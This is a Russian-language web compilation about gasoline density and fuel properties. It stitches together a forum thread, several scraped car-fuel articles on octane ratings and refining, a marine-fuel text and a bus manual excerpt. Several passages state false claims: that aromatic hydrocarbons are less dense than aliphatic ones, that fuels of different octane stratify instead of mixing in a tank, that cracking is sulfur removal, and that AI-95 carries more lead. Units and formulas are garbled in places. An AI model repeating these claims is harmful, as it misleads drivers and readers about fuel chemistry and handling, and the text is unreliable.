Плотность бензина: описание свойства топлива

Собственно про характеристики бензина перед тем, как задать вопрос, я прочитал, но напрямую ответа не нашел. Почему он возник, заехал на заправку, обычно заливаю АИ-95, но его только слили из бензовоза и поэтому им не заправляли.

Как это часто бывает, у фирменных заправок есть свой бензин типа с улучшенными свойствами, вот мне оператор и говорит, залейте, мол этот 92-й, он от 95-го не сильно отличается, у него плотность почти такая же.

Так-то я в курсе, что у бензина еще куча характеристик, помимо этой, почему оператор сделала такой упор именно на плотность? Ну помимо желания меня все-таки заправить.

перепутала со спиртом наверное? там действительно 3 деления шкалы не особо отличишь . хотя там и не плотность =95. так же как колеса r13 многие упорно называют радиусом 13, хотя сами понимают что они не правы.

Плотность бензина с октановым числом напрямую никак не связаны.На значение октанового числа могут влиять следующие факторы:1. Содержание углеводородов в изомерных формах (эталонный компонент — изооктан);2. Содержание октан повышающих добавок. (Тетраэтилсвинец практически не применяют, сейчас чаще используется метил-третично-бутиловый эфир (МТБЭ);

3. Содержание ароматических углеводородов (производные бензола), у них довольно высокие значения октанового числа, но их применение в бензинах ограничивается экологическими требованиями. Тем не менее бензины риформингов входят в состав любых товарных бензинов.

  • То есть бензины с плотностью от 725 до 775 кг/м3 могут быть совершенно любого октанового числа.
  • С уважением, главный специалист — технолог нефтеперерабатывающего завода.

quote: Originally posted by Журналист:почему оператор сделала такой упор именно на плотность?

quote: Изначально написано ASDER_K:по неграмотности

А может азс получает в килограммах, а продаёт в литрах? Тогда плотность для оператора имеет значение.

quote: Изначально написано HARON:

А может азс получает в килограммах, а продаёт в литрах? Тогда плотность для оператора имеет значение.

Почти так.Не знаю как на промежуточных нефтебазах, а нефтезавод отгружает продукцию в тоннах. Автоцистерна заезжает на пункт весового контроля до приёма товара и после. По результатам двух взвешиваний оформляются документы.

В паспорте на партию бензина указана фактическая плотность в соответствии с ГОСТ (измеренная в лаборатории при термостатировании на +15С).

Соответственно сливается на АЗС именно массовое количество топлива, а не объёмное, после чего по таблицам и фактическому значению температуры продукта можно примерно определить его объём.

Ну а продажа в литрах, поэтому чем холоднее бензин, тем выше текущая плотность и невыгоднее его продавать

quote: Originally posted by Magnum_357:С уважением, главный специалист — технолог нефтеперерабатывающего завода.

Плотность бензина аи 95 на заправке и в баке

В погоне за наиболее подходящим топливом, все больше автолюбителей интересуется свойствами бензина. Расскажем о главных характеристиках современного топлива.

Удельный вес и плотность бензина, во многом характеризуют его производительность. На рынке нефтепродуктов, существует большое количество видов смесей. Авто владелец, любящий свой автомобиль, должен понимать какое топливо следует использовать для правильной и долгосрочной работы автомобиля. Разберем подробно, один из наиболее популярных видов топлива.

АИ 95 — современный топливный состав, весьма высокого качества. Состав соответствует европейским стандартам качества и отвечает всем технологическим требованиям. Число 95 — показатель октанового числа бензина. Вычисление происходит путем научного изучения конкретного топлива.

Каждый состав, имеет свой экологический класс (обозначается коэффициентом К). Определенный состав имеет свои преимущества и недостатки, а так же плотность и вес.

Аи 95, характеризуется следующими качествами

Уникальность данного топлива заключается в:

  • Специально разработанный состав, для улучшения работы и продуктивности двигателя автомобиля. Бензин имеет оптимальные показатели (плотность, вес и тд.), которые позволяет существенно снизить громкость работы двигателя
  • В составе бензина, нет лишних примесей. Избавившись от металлов, производители добились увеличения срока эксплуатации двигателя. Данная консистенция, так же снизила расход бензина.
  • АИ 95, предотвращает окисление моторного масла.
  • Состав топлива, снизил выброс в атмосферу неблагоприятных веществ.

Рекомендуется использовать бензин, указанный производителем автомобиля. Использование топлива, с другим октановым числом, неблагоприятно сказывается на работе двигателя автомобиля. Используя неправильное топливо, вы ускоряете износ основных элементов вашей машины. Такой состав, не увеличит мощность автомобиля.

Экономя на топливе, можно переплатить за обслуживание автомобиля. Во избежание вывода из строя рабочих элементов машины, используете топливо рекомендованное заводом — изготовителе транспортного средства. Расход, в больше степени зависит от технических характеристик и правильной работы автомобиля.

При правильной эксплуатации и своевременном обслуживании машины, расход будет соответствовать указанному производителем. При повышении расхода, необходимо оперативно провести диагностику автомобиля.

Повышенных расход может свидетельствовать как о незначительной неисправности (нарушение ), так и о серьезных неисправности в работе двигателя.

Вопрос, какой бензин заливать остается актуальным по сегодняшний день. Не каждый владелец авто, пользуется рекомендациями изготовителя. На самом же деле, наиболее важна заправочная станция. Ведь не только плотность и вес, гарантируют качество бензина. Условия транспортировки и эксплуатации состава, во многом влияют на его качество.

Необходимо пользоваться услугами проверенных заправок, которые предоставляют бензин с реальным октановым числом. При использовании мало качественного сырья (бензин плотность, вес и октановое число которого не соответствует действительности), можно получить неблагоприятные последствие.

Только заправляясь на проверенных станциях, вы можете быть уверены в правильном использовании ресурса двигателя.

Во избежание последствий, используйте рекомендованный состав. Не в коем случае не экспериментируйте с топливом и не смешивайте в баке два разных вида смесей. Пользуйтесь советами производителя и услугами проверенных заправочных станций! Удачи в дороге!

  • Личный кабинет
    • Автомобилистам
    • Бизнес-клиентам
  • Сегодня в продаже
  • Качество
    • Автомобильный бензин BN-92
    • Бензин автомобильный
    • Дизельное топливо
    • Сжиженный углеводородный газ
    • Дизельное топливо зимнее t — 32 °С
  • Брендовое топливо BN-92
  • Автогаз ПБА
  • Способы оплаты

Бензин автомобильный

Используются в качестве моторного топлива на транспортных средствах с бензиновыми двигателями, предназначенными для работы на неэтилированном бензине. Качество бензина автомобильного АИ-92-К5-Евро, АИ-95-К5-Евро, АИ-98-К5-Евро соответствует техническим требованиям европейского стандарта EN 228:2008 «Автомобильные топлива. Неэтилированный бензин. Требования и методы испытаний».

  1. ОСНОВНЫЕ ТЕХНИЧЕСКИЕ ПАРАМЕТРЫ
  2. Наименование показателей
  3. Предельные значения
  4. минимальное
  5. максимальное
  6. Октановое число:по моторному методу: — для бензина марки АИ-92-К5-Евро — для бензина марки АИ-95-К5-Евро
  7. — для бензина марки АИ-98-К5-Евро
  8. по исследовательскому методу: — для бензина марки АИ-92-К5-Евро — для бензина марки АИ-95-К5-Евро
  9. — для бензина марки АИ-98-К5-Евро

Марки и маркировка бензина

Бензин – сложно вспомнить что-то более привычное для автомобилиста. Ежедневно автомобили сжигают сотни тысяч литров этого топлива, однако мало кто из автовладельцев всерьез задумывался над тем, как его производят, об особенностях состава топлива и других аспектах.

Немного терминологии

Как сообщают справочники, бензином именуется смесь лёгких углеводородов разных типов:

  1. Ароматические;
  2. Олефиновые;
  3. Парафиновые и прочие.

Эти углеводороды обладают горючими свойствами. Температура кипения смеси варьируется от 33 до 250 °С, что зависит от применяемых присадок.

Из чего делают бензин

Схема производства бензина

Горючее выпускается на мощностях нефтеперерабатывающих заводов. Сам производственный процесс очень сложен и делится на несколько циклов.

Сначала сырая нефть поступает на предприятие по трубопроводам, закачивается в огромные резервуары, после чего отстаивается. Далее начинается промывка нефти – в нее добавляется вода, а потом пропускается электрический ток. В итоге соли оседают на дно и стенки резервуаров.

Во время последующей атмосферно-вакуумной перегонки происходит подогрев нефти и ее деление на несколько типов. Осуществляются 2 этапа обработки:

По завершении процесса первичной переработки начинается каталитический риформинг, во время которого происходит очередное очищение бензина и извлечение фракций 92-го, 95-го и 98-го бензина.

Это процесс, который еще называют вторичной переработкой, включает 2 основных этапа:

  1. Крекинг – очистка нефти от примесей серы;
  2. Риформинг – наделение субстанции октановым числом.

Видео: Как делают бензин из нефти. Просто о сложном

По окончании данных этапов проходит контроль качества горючего, который занимает несколько часов.

Примечательно, что отечественные заводы (в большинстве) из 1 тонны нефти получают 240 литров бензина. Остальное приходится на газ, дизтопливо, мазут и авиационное горючее.

Что такое октановое число

Эта фраза известна очень многим, однако далеко не все знают, что именно означает данный термин и почему он так важен.

Октановое число – это способность топлива (в том числе и бензина) противостоять самопроизвольному возгоранию под давлением. Иначе говоря – его детонационная стойкость.

В процессе работы двигателя поршень сжимает топливно-воздушную смесь (такт сжатия). В этот момент, когда готовая смесь находится под давлением, может произойти ее самопроизвольное воспламенение еще до того, как свеча зажигания дала искру. В народе это явления называется одним словом – «детонация». Характерным признаком детонации являются шумы в двигателе – металлический звон.

Следовательно, чем выше октановое число, тем выше способность горючего сопротивляться детонации.

Маркировка бензина

На АЗС можно встретить самые разные наименования, не исключая и наиболее привычные для большинства автомобилистов. Обычно бензин маркируется литерами «А» и «АИ». Их расшифровка:

  1. «А» – это обозначение свидетельствует, что бензин автомобильный;
  2. «АИ» – буква «И» означает метод, которым было определено октановое число.

Существует 2 способа определения октанового числа – исследовательский (АИ) и моторный (АМ).

Исследовательский метод – он определяется путем тестирования топлива на одноцилиндровой силовой установке, при условии переменной степени сжатия, частоте вращения коленвала в 600 об/мин, угле опережения зажигания в 13° и температуре воздуха (всасываемого) в 52 °С. Эти условия аналогичны небольшим и средним нагрузкам.

Моторный метод – его определение осуществляется на аналогичной установке, однако прочие условия другие. Температура воздуха (всасываемого) составляет 149 °С, частота вращения коленвала равна 900 об/мин, а угол опережения зажигания переменный. Такой режим аналогичен высоким нагрузкам – езда в гору, работа мотора под нагрузкой и т. д.

Следовательно, число АМ всегда ниже, нежели АИ, а разница в показаниях свидетельствует о чувствительности горючего к работе силового агрегата в разных режимах. Примечательно, что в некоторых государствах на Западе октановое число определяется как среднее между значениями «АМ» и «АИ». В РФ же обозначается только более высокое значение «АИ», что и можно увидеть на всех АЗС.

Марки бензина

Чаще всего на отечественных заправочных станциях встречаются следующие обозначения:

  • Бензин АИ-98. Отличается высоким октановым числом. В отличие от АИ-95, который производится в соответствии с ГОСТом, 98-й выпускается согласно ТУ 38.401-58-122-95, а также ТУ 38.401-58-127-95. В производстве этой марки бензина запрещено применение алкилсвинцовых антидетонаторов. Выпуск данного высокооктанового бензина осуществляется с использованием ряда компонентов – толуола, изопентана, изооктана и алкилбензина.
  • Экстра АИ-95 – бензин повышенного качества, что достигается путем применения присадок антидетонационного типа. Производится из дистиллятного сырья, бензина каталитического крекинга, с добавлением изопарафиновых элементов (ароматических) и газового бензина. В составе нет свинца, что обеспечивает высокое качество бензина.
  • АИ-95 – основное отличие от Экстра АИ-95 в концентрации свинца, которая выше на 30%;
  • АИ-93 – делится на 2 категории: этилированный и неэтилированный. Этилированное топливо выпускается на основе бензина каталитического риформинга (мягкий режим) с добавлением в его состав толуола и алкилбензина, а также бутан-бутиленовой фракции. Неэтилированный выпускается из того же бензина каталитического риформинга (жесткий режим), с добавлением бутан-бутиленовой фракции, алкилбензина и изопентана;
  • АИ-92 – наиболее распространенный на рынке бензин среднего качества, с содержанием присадок антидетонационного типа. Максимальная плотность – 0,77г/смА-923. Может быть как этилированным, так и неэтилированным;
  • АИ-91 – отличается содержанием присадок антидетонационного типа. Это неэтилированный бензин с ненормированной плотностью и определенным процентом свинца в составе;
  • А-80 – состав этого бензина аналогичен таковому у АИ-92. Максимальная плотность – 0,755г/смА-803;
  • А-76 – обычно применяется в сельском хозяйстве. Выпускается этилированный и неэтилированный А-76 с ненормируемой плотностью. В его составе содержатся присадки разных типов (антиокислительные и антидетонационные), прямогонный бензин, а также итоговые продукты коксования, пиролиза и крекинга (термического и каталитического).

Видео: Аи-92 или Аи-95? Разгон до 100км и расход топлива на Mazda Demio (Ford Festiva Mini Wagon)

Какой бензин заливать?

Многие ищут ответ на этот вопрос, чтобы ненароком не навредить двигателю. В данном случае все просто – требования к топливу указаны в инструкции по эксплуатации конкретного автомобиля, а также продублированы на обратной стороне лючка бензобака.

Если производитель в качестве рекомендуемого топлива указал АИ-95, то заливать нужно именно его, а заправляться 92-м можно только на свой страх и риск.

Однако стоит помнить, что в мануале и на этикетке может быть указано как октановое число, так и марка топлива.

Также в мануале могут быть записаны разные типы бензина. Например:

  1. АИ-92 – допустимый;
  2. АИ-95 – рекомендуемый;
  3. АИ-98 – для улучшения характеристик.

Как видно, заливать в бак необходимо только рекомендуемое производителем авто топливо. Впрочем, использование бензина с более высоким октановым числом никакого вреда двигателю не нанесет.

Ведь чем выше октановое число, тем медленнее скорость горения и больше КПД топлива, что благотворно сказывается на отдаче двигателя, экономичности и других моментах. Как правило, прибавка в мощности и экономичности достигает 7%.

Кроме того, современные машины комплектуются ЭБУ, которые учитывают качество горючего и его октановое число, корректируя настройки.

Это значит, что в бак современного автомобиля с атмосферным мотором необходимо заливать АИ-95 на качественной АЗС. В крайнем случае, допускается АИ-92. Также можно ориентироваться на степень сжатия – если она ниже 10 ед., можно заливать АИ-92. Если выше – только 95-й.

Что касается турбированных двигателей, то для них рекомендуемое топливо – АИ-98 или Экстра АИ-95, но не АИ-92.

Можно ли смешивать бензин?

Этим вопросом задаются многие. В целом от смешивания горючего с разным октановым числом ничего катастрофического не произойдет, но только если смешивать рекомендуемый бензин с более высоким (по октановом числу).

К примеру, рекомендуемый для машины 92-й смешать с 95-м. Однако понижать не нужно.

Также стоит помнить, что плотность у бензина с разным октановым числом различается, так что его смешивания может вообще не произойти – горючее с более высоким октановым числом просто окажется вверху бака, а с низким внизу.

В целом, чтобы сохранить двигатель, рекомендуется не экономить, заправляться только на сертифицированных станциях крупных сетей (не франшиза) и лить в бак бензин с октановым числом, рекомендованным изготовителем (но не ниже).

Статья написана по материалам сайтов: portalvaz.ru, azs.belorusneft.by, avtomotoprof.ru.

«

Источник: https://the-avto.ru/drugoe/plotnost-benzina-ai-95.html

Физико-химические свойства топлив

Эксплуатационные свойства топлив оценивают показатели, характеризующие процессы подачи, смесеобразования, сгорания, а также способность вызывать нагарообразование и износ в дизелях. Основные из этих показателей регламентируют ГОСТы на топлива.

  • Плотность топлива — это отношение плотности топлива при 20° С к плотности дистиллированной воды при 4° С. В эксплуатационных условиях плотность должна учитываться в следующих случаях:
  • а) при бункеровке для определения массы остатка топлива в цистерне, весовой вместимости цистерны, массы принятого в цистерну топлива.
  • б) при подборе регулировочной шайбы в сепараторе;
  • в) при замене рекомендованной для данного двигателя марки топлива другой, так как плотность (удельный вес) влияет на дальнобойность топливного факела и ее изменение может отрицательно повлиять на условия смесеобразования и сгорания.
  • Плотность различных видов топлив при температуре 15 оС (60 оF), кг/м3, равна:
  • — морской газойль — 820—880;
  • — морское дизельное — 840—920;
  • — остаточное — 930—1 030.

Вязкость — это свойство, определяющее внутреннее трение между частицами жидкости при их перемещении относительно друг друга. Для оценки величины относительной силы трения в жидкости используют динамические, кинематические или условные единицы вязкости.

За единицу динамической вязкости принят пуаз (П), т. е. сила сопротивления, возникающая при относительном перемещении слоев жидкости со скоростью 1 см/с, когда площадь каждого слоя 1 см2 и расстояния между ними 1 см.

За единицу кинематической вязкости принят Стокс (0,01Ст-1 сСт) — отношение динамической вязкости жидкости к ее плотности при той же температуре.

За единицу условной вязкости принят градус условной вязкости (° ВУ) или градус Энглера (°Е). Вязкость нефтепродуктов в ° ВУ для данной температуры равна отношению времени истечения 200 мл нефтепродукта через калиброванное отверстие стандартного вискозиметра ко времени истечения 200 мл дистиллированной воды из того же вискозиметра при 20° С.

В США, Англии и некоторых других странах вязкость измеряется в секундах Редвуда (с R) или Сейболта (SU). При этом вязкость для данной температуры определяется временем истечения 50 мл нефтепродукта (по Редвуду) или 60 мл нефтепродуктов (по Сейболту) из вискозиметра.

В эксплуатационных условиях вязкость является определяющим фактором при: перекачке топлива насосами; сепарации; работе топливных насосов (оказывает влияния на закон подачи и на условия смазки плунжерных пар); впрыске и смесеобразовании (от нее зависит тонкость и однородность распыла).

Фракционный состав—это характеристика склонности топлива к испарению при повышении температуры. Склонность топлива к испарению при нагревании очень важна при запуске холодного двигателя, когда низкие температурные пределы выкипания значительно усложняют пуск.

Испаряемость топлива во многом определяет период (время) задержки самовоспламенения топлива, поданного в цилиндр двигателя. Фракционный состав дизельного топлива должен обеспечить выкипание не менее 90% топлива при температуре ниже 350°С, а полное испарение—при температуре 400° С.

В малооборотных дизелях на процесс смесеобразования отводится больше времени, поэтому влияние испаряемости на эффективность сгорания менее заметно.

Воспламеняемость — это склонность топлива к самовоспламенению при повышении температуры. Воспламеняемость зависит от температуры самовоспламенения, периода задержки воспламенения, группового и химического состава топлива.

Для характеристики воспламеняемости принято цетановое число, т. е. процентное содержание цетана (С1бНз4) в такой его смеси с a-метил нафталином (С11 Н10), которая имеет тот же период задержки воспламенения, что и испытуемое топливо.

Топливо, имеющее высокое цетановое число, обладает более коротким периодом задержки воспламенения. Цетановое число оказывает существенное влияние на пусковые качества топлива, жесткость работы двигателя, его экономичность.

Температура помутнения — характеризуется началом кристаллизации парафина, растворенного в топливе,

Температура застывания — это температура, при которой топливо теряет свою текучесть, т. е. будучи налитым, в стандартную пробирку, остается неподвижным в течение 1 мин после наклона пробирки под углом 45°.Застывание топлива связано с кристаллизацией растворенного в нем парафина.

Температура вспышки — это температура, при которой пары топлива вспыхивают в случае поднесения открытого пламени. Она зависит от количества легких фракций в топливе.

В эксплуатации температура вспышки имеет значение как величина, определяющая степень пожарной опасности топлива. Минимальное значение температуры вспышки для топлив, используемых в судовых дизелях, допускается не ниже 61° С.

Учитывают температуру вспышки при хранении топлива и выборе режима подогрева топлива в открытых емкостях.

Температура воспламенения—это температура, при которой топливо воспламеняется и горит не менее 5 сек. в случае поднесения к нему открытого пламени

Температура самовоспламенения—это температура, при которой топливо воспламеняется без воздействия постороннего источника тепла. Эта величина зависит от фракционного состава топлива и от давления воздуха, при повышении которого температура самовоспламенения понижается.

Температура самовоспламенения в эксплуатации является одним из факторов, учитываемых при выборе марки топлива.

.

Теплота сгорания разделяется на высшую и низшую. Высшая теплота сгорания — это общее количество тепла, выделившееся при сгорании 1 кг топлива. Низшая теплота сгорания — это количество тепла, выделившегося при сгорании 1 кг топлива, без учета тепла, израсходованного на испарение содержащейся в топливе воды.

В расчетах рабочих процессов двигателя используют низшую теплоту сгорания. Элементарный химический состав и теплота сгорания являются взаимосвязанными характеристиками.

Коксуемость—это свойство топлива образовывать на деталях ЦПГ твердый углеродистый осадок (нагар) при нагреве без доступа воздуха.

Коксуемость оценивается процентным содержанием кокса, получившегося в результате сгорания топлива.

Однако при оценке склонности топлива к нагарообразованию следует учитывать, что не только коксуемость, но и наличие в топливе элементов, образующих смолы, способствуют отложению нагара.

  1. Зольность— это величина твердого остатка, образовавшегося после сгорания топлива.
  2. Зола представляет собой окислы металлов или соли, оставшиеся в топливе после переработки нефти в виде растворенных металлоорганических соединений, а также механические примеси, попавшие в топливо в результате нарушения правил его транспортировки и хранения.
  3. Сера —-является вредной примесью, так как ее соединения в определенных условиях способствуют коррозии деталей топливной аппаратуры, ЦПГ и газо-выпускного тракта, а также увеличению нагарообразования в цилиндрах и повышенному износу трущихся деталей.
  4. Все продукты сгорания серы являются коррозионно-агрессивньши соединениями (содержащейся в топливе влаги, и соединения с ними окислов SOi и S0з получается сернистая H2SO3 и серная Н2S04 кислоты) и поэтому могут вызывать газовую и кислотную коррозию.

Под газовой коррозией понимают химическую коррозию, происходящую в зоне высоких температур (1000°С и более). Для уменьшения вредных влияний серы в двигателях используются специальные распылители ( с увеличеным диаметром распылителей и углом распыла топлива ).

Ванадий

Интенсивность газовой коррозии повышается при содержании в сернистых топливах соединений ванадия. Во время сгорания топлива ванадий окисляется и получается его пяти окись VzOs, которая, являясь коррозионно-активным соединением, способствует к тому же образованию окисла SOg. Но в дизелях поверхности деталей не нагреваются до температуры, при которой происходит интенсивная газовая коррозия.

Содержание механических примесей характеризует наличие в топливе механических частиц металла, глины, кокса и т. д. Эти включения попадают в топливо из нефти в процессе ее переработки, а также при транспортировке и хранении топ­лива.

Содержание воды в топливе (в процентах) обусловливается технологией переработки нефти. На содержание воды влияют условия хранения и подогрева топлива. Вода ухудшает условия работы топливной аппаратуры и способствует коррозии ее деталей, отрицательно влияет на режим горения и снижает теплоту сгорания топлива.

  • Хотя суда оборудованы соответствующими сепараторами и фильтрами, их правильная эксплуатация важна для получения удовлетворительных результатов.
  • ТР ТС 013/2011
  • Приложение 7 к техническому регламенту Таможенного союза
  • «О требованиях к автомобильному и авиационному бензину, дизельному и судовому топливу, топливу для реактивных двигателей и мазуту».
  • Требования к характеристикам судового топлива
  • Массовая доля серы, не более % 3,5 (по 31 декабря 2011 г.)
  • 2 (по 31 декабря 2012 г.)
  • 1,5 (с 1 января 2013 г.)
  • 0,5 (с 1 января 2020 г.)
  • Температура вспышки в закрытом тигле, не ниже °C 61
  • Марки судового дизельного топлива.
  • Нефтеперерабатывающей промышленностью вырабатывается дизельное топливо по ГОСТ 305-82 трех марок: Л — летнее, применяемое при температурах окружающего воздуха выше 0 °С;
  • З — зимнее, применяемое при температурах до -20 °С (в этом случае зимнее дизельное топливо должно иметь заст < -35 °С и п < -25 °С), или зимнее, применяемое при температурах до -30 °С, тогда топливо должно иметь заст < -45 °С и п

Источник: https://infopedia.su/8xf77d.html

Чему равна плотность бензина? — АвтоЖидкость

Плотность бензина в кг/м3 (иногда встречается и внесистемное обозначение – г/см3) представляет собой физическую величину, по которой можно установить массовое количество действующего вещества – горючего углеводородного компонента – в единице объёма топлива, кг/л. Плотность косвенно служит мерой качества многих жидких рабочих сред.

Условия, при которых определяют плотность бензина

Прямой зависимости между качеством бензина (это распространяется также и на плотность солярки или плотность керосина) нет, поскольку все измерения должны происходить при определённой температуре.

Ныне действующий ГОСТ Р 32513-2013 устанавливает такую температуру 15ºС, в то время как прежний стандарт – ГОСТ 305-82 – считал такой температурой 20ºС. Поэтому, приобретая бензин, не лишне поинтересоваться, согласно какому стандарту производилось определение плотности.

Результаты, как и для всех углеводородов, будут заметно отличаться. Удельный вес бензина равен значению его плотности, когда последняя измеряется в кг/л.

Плотность бензина в кг/м3 часто служит камнем преткновения во взаимоотношениях между производителем и оптовым потребителем горючего.

Проблема заключается в том, что с уменьшением плотности масса бензина в партии уменьшается, в то время как его объём сохраняется на прежнем уровне.

Разница может достигать сотен и тысяч литров, однако при покупке бензина в розницу это не особо критично.

По плотности можно устанавливать также вид нефти, их которой производился бензин. Для тяжёлых нефтепродуктов, в которых содержится больше серы, плотность выше, хотя на большинство эксплуатационных показателей бензина состав исходной нефти мало влияет, просто используется соответствующая технология перегонки.

Чем измеряется плотность бензина?

Любой бензин представляет собой жидкую смесь углеводородов, полученную в результате фракционной перегонки нефти.

Эти углеводороды могут быть классифицированы на ароматические соединения, которые имеют кольца атомов углерода, и алифатические соединения, которые состоят только из прямых углеродных цепей.

Следовательно, бензин — это класс соединений, а не конкретная смесь, поэтому его состав может варьироваться в широких пределах.

Самый простой способ определения плотности в домашних условиях следующий:

  1. Выбирается любая градуированная ёмкость, которая взвешивается.
  2. Результат записывается.
  3. Ёмкость заполняется 100 мл бензина и также взвешивается.
  4. Масса пустой ёмкости вычитается из массы заполненной.
  5. Результат делится на объём бензина, который находился в ёмкости. Это и будет плотность горючего.

При наличии ареометра можно выполнить измерение альтернативным способом. Ареометр — устройство, которое реализует принцип Архимеда для измерения удельного веса. Этот принцип гласит, что объект, плавающий в жидкости, вытеснит количество воды, равное весу объекта. По показаниям шкалы ареометра устанавливают искомый параметр.

Последовательность измерений такова:

  1. Заполнить прозрачную ёмкость и аккуратно поместите ареометр в бензин.
  2. Вращать ареометр, чтобы вытеснить все пузырьки воздуха и позволить стабилизировать положение прибора на поверхности бензина. Важно удалить пузырьки воздуха, потому что они увеличат плавучесть ареометра.
  3. Установить ареометр так, чтобы поверхность бензина была на уровне глаз.
  4. Записать значение шкалы, соответствующей уровню поверхности бензина. Одновременно записывают и температуру, при которой происходило измерение.

Обычно бензин имеет плотность в пределах 700… 780 кг/м3, в зависимости от его точного состава. Ароматические соединения менее плотные, чем алифатические, поэтому измеренный показатель может указывать на относительную долю этих соединений в бензине.

Значительно реже для определения плотности бензинов используют пикнометры (см. ГОСТ 3900-85), поскольку данные приборы для летучих и маловязких жидкостей не отличаются стабильностью своих показаний.

Плотность бензина АИ-92

Стандарт устанавливает, что плотность бензина марки АИ-92 неэтилированного должна находиться в пределах 760±10 кг/м3. Замеры должны быть произведены при температуре 15ºС.

Плотность бензина АИ-95

Стандартное значение плотности бензина марки АИ-95, которая была измерена при температуре 15ºС, равно 750±5 кг/м3.

Плотность бензина АИ-100

Торговая марка этого бензина – Лукойл Экто 100 – устанавливает нормативный показатель плотности, кг/м3, в пределах 725…750 (также при 15ºС).

Источник: https://avtozhidkost.ru/plotnost-benzina-kg-m3-ai-92-ai-95-ai-100/

Плотность бензина — MKSM

Плотность вещества в физике вычисляется путем отношения массы к объему или массе единичного объема. То же самое правило действует по отношению к жидкостям, однако здесь есть некоторые нюансы.

Если плотность дистиллированной воды при температуре 4 градуса по Цельсию равна 1 г/см3, то данное значение буде изменяться в зависимости от состава и условий взвешивания.

Как правило, плотность составных веществ, таких как бензин можно вычислить по формуле ρсмеси ∑ρi ci, в соответствии с правилами аддитивности.

Дело в том, что плотность мелкодисперсной, либо мелкокомпонентной жидкости равна сумме произведений каждого составляющего к массовой доле.

Данный расчетный метод весьма неудобен для вычисления, так как требует наличия хроматографического оборудования (весьма дорогостоящего) в лабораторных условиях и высококвалифицированного персонала, однако он вполне пригоден для вычисления плотности нефтепродуктов при известном составе и отсутствии необходимости точного конечного значения.

Отметим, что на сегодняшний день существует множество различных вариаций состава углеводородов исходя из марки нефтепродуктов, что дает различные свойства и назначение конечному веществу.

Способы получения бензина

Качественный конечный продукт, такой на бензин, невозможно получить без наличия соответствующего сырья, а также метода его переработки.

Современные технологии позволяют получать бензин различных марок множеством способов: прямой перегонки нефтепродуктов относительно дешевый способ переработки нефти, который однако, весьма неэффективен, так как для получения конечного продукта требуется использования дополнительных присадок.

Получить данным способом определенную марку бензина практически невозможно. Риформинг применяются для повышения качественного состава бензина. Используется для получения авиационного топлива с высоким октановым числом.

каталитический крекинг метод глубокой переработки нефтепродуктов, используемый для получения высококачественного бензина. Основной способ производства в промышленности, так как позволяет совмещать данный метод с алкилированием и гидрокрекингом.

Отметим, состав бензина определяется наличием трех основных компонентов: смеси в различной пропорции нефтенов, олефинов и парафинов.

При этом, современные нормы экологической безопасности требуют сокращения использования элиленовых углеводородов (олефинов), или ароматических углеводородов, которые являются основными причинами выделения угарного газа (СО).

При этом, плотность бензина за счет введения в его состав последних выше по отношению к топливу с низким уровнем содержания бензола и его гомологов. Тоже самое относится и к октановому числу.

Помимо этого, на плотность бензина также оказывают влияние специальные добавки, которые применяются для снижения уровня СО при сгорании топлива. К примеру, такие соединения как этанол и иные содержащие в своем составе кислород, приводят к более интенсивному и полному сгоранию бензина.

Отметим, применение компонентов в составе топлива строго регламентировано в соответствии с нормативными документами.

Государственные стандарты, применяемые к бензинам

В настоящее время в Российской Федерации действует несколько нормативных документов, определяющих качественные характеристики топлива, используемое в работе бензиновых двигателей внутреннего сгорания.

В частности, ГОСТ 2184-87, переизданный в 2003 году действует также на территории десяти стран бывшего Советского Союза. В соответствии с документом, его требования распространяются только на неэтилированный бензин марки А-76.

При этом, требования по плотности вещества (при температуре 20 градусов Цельсию) не обозначены, однако ее определение до отгрузки топлива потребителю обязательна.

ГОСТ ГОСТ Р 51105-97 с изменениями от 1 января 1999 года регламентирует определение плотности неэтилированных бензинов различных марок. В зависимости от данного требования автомобильные бензины подразделяются на: Нормаль 80, Регулятор 91, Регулятор 92.

Премиум 98, Супер 98. Отметим, что плотность топлива с октановым числом от 91 до 98 определяется при температурном режиме 15 градусов по Цельсию и составляет от 725 до 780 кг/м3.

Все измерения проводятся в соответствии с ГОСТом Р 51069-97 и при помощи ареометра.

Более качественное топливо определяется в соответствии с ГОСТ Р 51886-2002, изменения в который внесены в 2008 году. Данный документ соответствует европейским стандартам автомобильного топлива и распространяется на автомобильные бензины (неэтилированные), марок Супер Евро-98 и Премиум Евро-95. Плотность таких бензинов лежит в пределах от 720 до 750 кг/м3.

Зачем измерять плотность бензина?

Такая характеристика как плотность бензина в ряде случаев помогает определять химический состав вещества, а также идентифицировать его. К примеру, если измеренная плотность вещества больше, или меньше требуемой в соответствии с ГОСТом, то можно с уверенностью сказать, что этот не бензин без проведения более детального химического анализа.

Также определение плотности бензина помогает на практике вычислить приблизительную массу вещества в резервуаре, когда невозможно его взвесить напрямую. Требование к данной методике измерения содержатся в Государственном стандарте Р 8.595-2004.

Источник: http://mosksm.ru/article/plotnost-benzina/

Описание эксплуатационных свойств, применяемых топлив, смазочных материалов и специальных жидкостей автомобиля ПАЗ — 672

Автомобильные бензины являются основным материалом, который расходуется при использовании автомобилей с карбюраторными двигателями. От качества бензина зависит надежность работы двигателя и, следовательно, расходы на его обслуживание и ремонт. Знание свойств бензина и умение правильно его применять является одним из звеньев, определяющих эффективность использования автомобилей.

Автомобильный бензин — смесь углеводородов, имеющих температуры кипения в пределах от 40 до 200оС. По внешнему виду он представляет собой прозрачную маловязкую бесцветную или окрашенную жидкость, обладающую специфическим запахом и быстро испаряющуюся в нормальных условиях. Бензин легче воды, практически в ней не растворяется и при соответствующих условиях сгорает без остатка.

Карбюрационные свойства:

— Плотность. Под плотностью понимают массу вещества, отнесённую к единице его объёма. Плотность бензина (как и его вязкость) влияет на расход топлива через калиброванные отверстия жиклёров карбюратора. Уровень бензина в поплавковой камере также зависит от плотности. Для автомобильных бензинов плотность при 20 0С должна находиться в пределах от 690 до 750 кг/м3.

  • Плотность топлива определяется ареометром, гидростатическими весами и пикнометром.
  • Плотность бензина с понижением температуры на каждые 10 0С возрастает примерно на 1 %. Зная температуру при которой была определена плотность можно привести её к стандартной температуре (+20 0С):
  • r20 = rt + g (t — 20), (2.1),
  • где: rt — плотность испытуемого продукта при температуре испытаний, кг/м3; t — температура испытания, 0С; g — температурная поправка плотности (определяется по расчётной таблице, находится в пределах от 0,515 до 0,910 кг/м3).
  • — Вязкость (внутреннее трение) — свойство жидкостей, характеризующее сопротивление действию внешних сил, вызывающих их течение.
  • Величина вязкости может быть выражена в абсолютных единицах динамической, кинематической вязкости или в условных единицах.
